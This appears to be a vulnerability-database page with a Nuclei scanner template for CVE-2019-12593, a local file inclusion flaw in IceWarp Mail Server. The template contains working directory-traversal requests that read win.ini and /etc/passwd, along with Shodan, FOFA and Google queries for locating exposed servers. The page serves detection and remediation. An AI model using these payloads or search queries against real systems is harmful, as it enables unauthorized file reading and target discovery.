Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-12593
HistorySep 05, 2020 - 6:49 a.m.

IceWarp Mail Server <=10.4.4 - Local File Inclusion

2020-09-0506:49:58
ProjectDiscovery
github.com
3

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.111 Low

EPSS

Percentile

95.2%

IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
id: CVE-2019-12593

info:
  name: IceWarp Mail Server <=10.4.4 - Local File Inclusion
  author: pikpikcu
  severity: high
  description: |
    IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal.
  impact: |
    An attacker can read sensitive files on the server, potentially leading to unauthorized access, data leakage, or further exploitation.
  remediation: |
    Upgrade IceWarp Mail Server to a version higher than 10.4.4 or apply the vendor-provided patch to fix the LFI vulnerability.
  reference:
    - https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt
    - http://www.icewarp.com
    - https://nvd.nist.gov/vuln/detail/CVE-2019-12593
    - http://packetstormsecurity.com/files/153161/IceWarp-10.4.4-Local-File-Inclusion.html
    - https://github.com/sobinge/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-12593
    cwe-id: CWE-22
    epss-score: 0.07016
    epss-percentile: 0.93948
    cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: icewarp
    product: mail_server
    shodan-query:
      - title:"icewarp"
      - http.title:"icewarp server administration"
      - http.title:"icewarp"
      - cpe:"cpe:2.3:a:icewarp:mail_server"
    fofa-query:
      - title="icewarp server administration"
      - title="icewarp"
    google-query:
      - Powered By IceWarp 10.4.4
      - intitle:"icewarp"
      - powered by icewarp 10.4.4
      - intitle:"icewarp server administration"
  tags: cve,cve2019,packetstorm,lfi,icewarp

http:
  - method: GET
    path:
      - '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini'
      - '{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "[intl]"
          - "root:x:0"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502202177363f6c0dffa62bed56e7e3bbda6a119d55bc8af0204ed2b5e67b50f1ba19022100c28e7286f9e915f1e99af251976cd9fe57be0735149948824d02a55c145137ac:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.111 Low

EPSS

Percentile

95.2%